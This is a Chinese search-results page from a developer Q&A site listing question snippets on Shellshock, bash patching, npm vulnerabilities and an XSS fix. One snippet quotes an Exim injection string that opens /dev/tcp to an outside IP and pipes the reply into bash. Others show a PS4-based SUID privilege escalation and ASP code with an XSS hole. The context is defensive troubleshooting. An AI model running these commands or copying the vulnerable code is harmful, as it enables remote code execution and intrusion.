腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
如何防止Apache将请求行作为
bash
命令执行?
、
、
、
我在Apache 2.2.22上运行了几个虚拟主机,刚刚注意到日志中发生了一个相当惊人的事件,来自冰岛的“安全扫描器”能够使用以下http请求行将一个文件放入cgi目录:它有效地下载了有关文件。有人能解释一下这个请求是如何实际执行
bash
命令的吗?
浏览 3
提问于2014-09-29
得票数 0
回答已采纳
1
回答
是否有必要对ShellShock采取进一步行动?
、
这个网站上的问题是:“何时引入了fully休克(CVE-2014-6271/7169)
漏洞
,以及完全
修复
它的修补程序是什么?”解释该
漏洞
是如何被治愈的,但据我所见,没有解释个人在自己的计算机上需要做什么。如果yum -y update
bash
给了No packages marked for update.
浏览 0
提问于2014-10-03
得票数 0
回答已采纳
1
回答
如何修补RHEL上的
bash
漏洞
(外壳休克)错误?
、
、
、
、
我们有超过10000台服务器要修补
bash
漏洞
(外壳休克)错误。现在我的问题是,修补这个bug的命令是什么?我们如何检查修补程序是否已经安装,bug是否已
修复
?
浏览 0
提问于2014-11-13
得票数 -1
回答已采纳
1
回答
将修补的
bash
恢复为apt维护
、
、
上个月,我在运行ubuntu11.10的服务器上手动修补了
bash
以获取shellshock休克bug,正如在这里的注释:什么是CVE-2014-6271
bash
漏洞
(壳牌休克),我如何
修复
它?我应该如何卸载修补程序并还原
bash
以进行apt维护?在补丁上运行make uninstall完成了任务,谢谢@muru的建议
浏览 0
提问于2014-10-09
得票数 1
1
回答
ShellShock -
bash
已经更新了吗?
、
我正试图在我的PC上
修复
这个新的ShellShock错误(运行Ubuntu14.04)。从我收集到的信息来看,最简单的方法就是通过终端更新
bash
(我已经测试了我的系统是否存在
漏洞
,恐怕就在那里)。我试过的是:sudo apt-get install
bash
bash
is already the newest version. 0 upgraded, 0 newly in
浏览 0
提问于2014-09-28
得票数 4
回答已采纳
1
回答
科多瓦不会安装
、
、
any"} (当前:{"o“)cordova@8.0.0从一个贡献者中添加1个包,删除2个包,更新4个pa npm审核修正npm警告包防火墙同时包含开发和生产依赖项警告不跳过可选依赖:不支持fsevents@1.2.4
浏览 2
提问于2018-09-25
得票数 0
回答已采纳
1
回答
如何确定哪个依赖关系导致Google警告?
、
、
、
我目前正在处理一个大型遗留项目,并试图
修复
OpenSSL
漏洞
问题,正如中所解释的那样。有任何方法可以找出具有此
漏洞
的特定库吗?我使用了提供的
bash
脚本,它指向一个本机依赖项(实际上是.so文件)。有没有办法从那里找出实际的依赖关系?
浏览 2
提问于2016-07-04
得票数 1
回答已采纳
1
回答
滥用Shell功能进行权限提升
、
、
、
、
Here是房间内容的副本: 注意:这将不适用于
Bash
版本4.4和更高版本。在调试模式下,
Bash
使用环境变量PS4显示额外的调试语句提示。运行/usr/local/bin/ SUID - env 2可执行文件,启用
bash
调试,并将PS4变量设置为嵌入式命令,该命令创建/bin/
bash
: env -i SHELLOPTS=xtracePS4='$(cp /bin/
bash
/tmp/rootb
浏览 0
提问于2022-07-13
得票数 1
回答已采纳
2
回答
如何
修复
这些
漏洞
?(npm审计
修复
无法
修复
这些
漏洞
)
、
我的项目有6个高度严重的
漏洞
,我不知道如何
修复
它们。npm审计
修复
失败。请帮我把这个修好。 我在我的项目中安装了,并且在它安装完之后,就显示了这些
漏洞
。我不知道有什么联系。
浏览 4
提问于2019-10-18
得票数 10
回答已采纳
1
回答
如何将ubuntu12.04LTS的
bash
降级/卸载,使其回到原来的易受攻击的版本?
、
、
、
、
我尝试通过更新
bash
来解决环境变量的shell冲击
漏洞
。是否有任何方法降低
bash
的等级,并再次尝试演示shell休克
漏洞
?
浏览 0
提问于2015-10-19
得票数 3
1
回答
为什么我不能让ShellShock
Bash
bug在
Bash
4.2.0上复制呢?
、
、
、
我正在学习ShellShock
漏洞
,我想测试更早版本的
Bash
。
bash
./configure完成后,我运行以下
漏洞
以查看
bash
是否易受攻击:但它没有打印“易受攻击”--这意味着它并不脆弱--我不明白为什
浏览 3
提问于2020-12-02
得票数 0
回答已采纳
1
回答
突如其来的身份不明的冻结电子邮件与代码注入类收件人
、
、
013P Received: 29013P Received: 31root+${run{/bin/
bash
-c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail -n +11 <&5 |
bash
" &am
浏览 0
提问于2019-06-16
得票数 0
回答已采纳
3
回答
是否有任何IDE插件可用于在编码时扫描?
、
、
有像Fortify这样的工具可用,它可以与IDE集成,以扫描源代码中的安全
漏洞
。但我期望的是一个像eclipse这样的IDE插件,它可以在输入代码时检查
漏洞
。(对于Java程序,可能每个分号(;)都应该检查
漏洞
)。如果该工具建议在旅途中进行
修复
,那就太好了。这样开发人员就可以
修复
漏洞
,从而
修复
eclipse中的编译问题。与运行一次完整的代码扫描、检查
漏洞
、
修复
这些
漏洞
并再次扫描整个代码库相比,这将大大减少开发人员的时
浏览 4
提问于2009-05-26
得票数 0
3
回答
Shell休克:为什么在测试
漏洞
时出现此错误
、
2014年9月26日,在英国,在经历了一次yum update
bash
之后,我读过关于Shell休克
漏洞
的文章,当时UTC在1100点左右,我尝试了以下推荐的测试模式:并且,在用户模式和su模式下,在一台机器上得到了这样的结果:
bash<
浏览 0
提问于2014-09-26
得票数 5
回答已采纳
2
回答
"Shell休克“--当‘`system()’syscall或‘`exec(
Bash
)’时可以利用,对吗?
、
、
、
为了通过"Shell休克“进行攻击,我们影响的二进制文件需要执行
bash
(并且我们需要对命令行产生影响)吗?因此,如果二进制文件不直接执行
bash
,并且不使用system()系统调用(它使用shell进行命令计算),而是通过来自exec()家族的系统调用(或者通过动态加载(例如ld等)调用辅助程序,那么给定二进制文件是否安全(因此,检查
bash
的system()调用和exec()调用是否是良好的审计评估标准?)
浏览 0
提问于2014-09-26
得票数 0
回答已采纳
4
回答
Bash
中的Shell休克
漏洞
背后的行为是否记录在案,或者根本是故意的?
、
、
、
、
最近的一个
漏洞
,,在如何解释环境变量。该
漏洞
依赖于
Bash
将某些环境变量声明解析为函数定义,但随后继续执行定义后面的代码:…因此,很明显,在执行
漏洞
攻击时,没有设置args。无
浏览 11
提问于2014-09-24
得票数 56
回答已采纳
1
回答
如何知道我的系统是否易受ShockShell
漏洞
的影响?
、
最近发现的ShockShell
漏洞
会影响许多Linux和Mac系统,因为它们使用的是易受攻击的
BASH
。 我如何知道我是否容易受到这一攻击,以及如何保护自己不受攻击?
浏览 0
提问于2014-09-25
得票数 1
1
回答
修复
XSS
漏洞
、
Bellow代码容易受到XSS攻击。我已经核实过了。我想把它修好。我该怎么做呢?代码是用经典的asp编写的。 Dim strGo : strGo = Request.QueryString.Item("go"); Response.Write "document.location.href = 'browserCompatibilities.asp?go=" & strGo;
浏览 36
提问于2021-09-14
得票数 0
2
回答
修复
NPM
漏洞
、
不幸的是,这些包已经过时了,我收到了关于
漏洞
的警告。我遵循了的一系列建议,即:npm audit fix --forcenpm audit说仍然有24个
漏洞
。但是,上面的任何命令都不会
修复
它们。
修复
这些
漏洞
的下一步步骤是什么? "typescript&
浏览 22
提问于2022-03-27
得票数 5
回答已采纳
1
回答
修复
mathjs
漏洞
、
、
在math.js中有一个
漏洞
,如果一个人输入一个不可能的问题,1:999999999999999999999,它会使node.js进程崩溃,你有什么想法吗?
浏览 38
提问于2021-01-21
得票数 1
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
macOS 修复邮件漏洞
WEB应用漏洞及修复汇总
针对网站漏洞修复区块链漏洞之以太坊
网站漏洞修复方案防止SQL注入攻击漏洞
maccms网站漏洞修复方案
热门
标签
更多标签
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
活动推荐
运营活动
广告
关闭
领券